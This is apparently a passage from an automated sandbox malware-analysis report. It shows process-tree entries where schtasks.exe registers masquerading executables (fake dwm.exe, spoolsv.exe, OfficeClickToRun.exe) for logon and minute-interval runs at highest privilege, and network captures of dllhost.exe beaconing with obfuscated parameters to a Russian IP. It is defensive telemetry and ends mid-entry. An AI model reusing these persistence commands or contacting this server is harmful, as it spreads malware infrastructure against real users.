                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\d9c22b4eaa3c0b9c12c7\upfc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1244
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\d9c22b4eaa3c0b9c12c7\upfc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1636
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\OfficeClickToRun.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1552
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\dfe2e59cddd00040f555dab607351a1d\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1172
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5056
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\SearchApp.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4916
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\SearchApp.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2468
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\SearchApp.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2044
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\dwm.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2532
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2784
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2768
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\d9c22b4eaa3c0b9c12c7\backgroundTaskHost.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1860
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\d9c22b4eaa3c0b9c12c7\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1652
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\d9c22b4eaa3c0b9c12c7\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4684
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\System.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2944
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\System.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3184
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\System.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1604
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\System.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3956
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\System.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4452
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\System.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2020
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\spoolsv.exe'" /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:432
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\dfe2e59cddd00040f555dab607351a1d\spoolsv.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4004
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\dfe2e59cddd00040f555dab607351a1d\spoolsv.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2112

                                                  Network

                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&bx1Qy2AhkGKxnW3IR13=vsmEyTTkAA4xTy9xm5D5TAcYsHyOUU&dSjzsKwbeiahkLWeyWGgVx7mv=OWrfEPqMb HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?DmS0vJjd=yjvz&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DmS0vJjd=yjvz
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?DmS0vJjd=yjvz&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DmS0vJjd=yjvz HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/css
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:17 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?DmS0vJjd=yjvz&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DmS0vJjd=yjvz
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?DmS0vJjd=yjvz&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DmS0vJjd=yjvz HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/css
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:17 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-us
                                                    DNS
                                                    tse1.mm.bing.net
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    tse1.mm.bing.net
                                                    IN A
                                                    Response
                                                    tse1.mm.bing.net
                                                    IN CNAME
                                                    mm-mm.bing.net.trafficmanager.net
                                                    mm-mm.bing.net.trafficmanager.net
                                                    IN CNAME
                                                    ax-0001.ax-msedge.net
                                                    ax-0001.ax-msedge.net
                                                    IN A
                                                    150.171.28.10
                                                    ax-0001.ax-msedge.net
                                                    IN A
                                                    150.171.27.10
                                                  • flag-us
                                                    GET
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                    Remote address:
                                                    150.171.28.10:443
                                                    Request
                                                    GET /th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                                    host: tse1.mm.bing.net
                                                    accept: */*
                                                    accept-encoding: gzip, deflate, br
                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                    Response
                                                    HTTP/2.0 200
                                                    cache-control: public, max-age=2592000
                                                    content-length: 443021
                                                    content-type: image/jpeg
                                                    x-cache: TCP_HIT
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: *
                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                    timing-allow-origin: *
                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    x-msedge-ref: Ref A: FCC21634423E44BCA43774B464A08236 Ref B: LON04EDGE0612 Ref C: 2025-03-22T20:32:18Z
                                                    date: Sat, 22 Mar 2025 20:32:17 GMT
                                                  • flag-us
                                                    GET
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388237_16CFOYO7VUY1K6DRH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                    Remote address:
                                                    150.171.28.10:443
                                                    Request
                                                    GET /th?id=OADD2.10239339388237_16CFOYO7VUY1K6DRH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                                    host: tse1.mm.bing.net
                                                    accept: */*
                                                    accept-encoding: gzip, deflate, br
                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                    Response
                                                    HTTP/2.0 200
                                                    cache-control: public, max-age=2592000
                                                    content-length: 619595
                                                    content-type: image/jpeg
                                                    x-cache: TCP_HIT
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: *
                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                    timing-allow-origin: *
                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    x-msedge-ref: Ref A: 8F2745BE5ECE478682113198B5688D76 Ref B: LON04EDGE0612 Ref C: 2025-03-22T20:32:18Z
                                                    date: Sat, 22 Mar 2025 20:32:17 GMT
                                                  • flag-us
                                                    GET
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                                    Remote address:
                                                    150.171.28.10:443
                                                    Request
                                                    GET /th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                                    host: tse1.mm.bing.net
                                                    accept: */*
                                                    accept-encoding: gzip, deflate, br
                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                    Response
                                                    HTTP/2.0 200
                                                    cache-control: public, max-age=2592000
                                                    content-length: 493712
                                                    content-type: image/jpeg
                                                    x-cache: TCP_HIT
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: *
                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                    timing-allow-origin: *
                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    x-msedge-ref: Ref A: B4046D470B6144F3958A518BFB90B6B4 Ref B: LON04EDGE0612 Ref C: 2025-03-22T20:32:18Z
                                                    date: Sat, 22 Mar 2025 20:32:17 GMT
                                                  • flag-us
                                                    GET
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388236_1HL4SRJ7X21NUOQZ9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                                    Remote address:
                                                    150.171.28.10:443
                                                    Request
                                                    GET /th?id=OADD2.10239339388236_1HL4SRJ7X21NUOQZ9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                                    host: tse1.mm.bing.net
                                                    accept: */*
                                                    accept-encoding: gzip, deflate, br
                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                    Response
                                                    HTTP/2.0 200
                                                    cache-control: public, max-age=2592000
                                                    content-length: 585469
                                                    content-type: image/jpeg
                                                    x-cache: TCP_HIT
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: *
                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                    timing-allow-origin: *
                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    x-msedge-ref: Ref A: FD053B1D3AE44A1F812653DB92E61766 Ref B: LON04EDGE0612 Ref C: 2025-03-22T20:32:18Z
                                                    date: Sat, 22 Mar 2025 20:32:17 GMT
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:25 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KhIZrDjD9ngJpyTM51bx=YKjLeK8yOQraWKKhdr6lfuQ&TsTuwijG43vWjNN3kOvXytToIo=KeMMn4u2v0OCqrk&cYx8PdDBR929jZplH=Ymrr HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:25 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/javascript
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:35 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SKTh2cv6rBgr=PtA&yZ=xGjs8NCP6RAvvuqtm4WuB6afi6Dj HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/javascript
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-us
                                                    DNS
                                                    c.pki.goog
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    c.pki.goog
                                                    IN A
                                                    Response
                                                    c.pki.goog
                                                    IN CNAME
                                                    pki-goog.l.google.com
                                                    pki-goog.l.google.com
                                                    IN A
                                                    142.250.180.3
                                                  • flag-ru
                                                    GET
